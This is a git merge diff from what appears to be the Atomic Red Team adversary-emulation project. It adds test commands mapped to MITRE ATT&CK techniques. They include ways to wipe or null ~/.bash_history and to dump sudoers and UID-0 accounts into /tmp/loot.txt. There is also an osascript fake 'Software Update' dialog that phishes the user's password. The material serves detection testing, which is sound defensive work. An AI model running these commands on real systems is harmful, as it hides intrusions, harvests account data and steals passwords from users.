Merge remote-tracking branch 'redcanaryco/master'
This commit is contained in:
atmathis
@@ -15,4 +15,8 @@ MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
|
||||
|
||||
rm ~/.bash_history
|
||||
|
||||
echo "" > ~/.bash_history
|
||||
|
||||
cat /dev/null > ~/.bash_history
|
||||
|
||||
ln -sf /dev/null ~/.bash_history
|
||||
|
||||
@@ -6,6 +6,18 @@ List of all accounts:
|
||||
|
||||
cat /etc/passwd
|
||||
|
||||
View sudoers access (requires root):
|
||||
|
||||
cat /etc/sudoers > /tmp/loot.txt
|
||||
|
||||
View accounts with UID 0:
|
||||
|
||||
grep 'x:0:' /etc/passwd > /tmp/loot.txt
|
||||
|
||||
List opened files by user:
|
||||
|
||||
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
|
||||
|
||||
Currently logged in:
|
||||
|
||||
Local:
|
||||
@@ -15,3 +27,7 @@ Local:
|
||||
Remote:
|
||||
|
||||
finger @<computer_name>
|
||||
|
||||
Show if a user account has ever logged in remotely:
|
||||
|
||||
lastlog > /tmp/loot.txt
|
||||
|
||||
+1
-1
@@ -2,7 +2,7 @@
|
||||
|
||||
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| Bootkit | Setuid and Setgid | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
|
||||
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
|
||||
@@ -7,4 +7,6 @@ MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
|
||||
|
||||
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
|
||||
|
||||
Reference:
|
||||
|
||||
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
|
||||
|
||||
Reference in New Issue
Block a user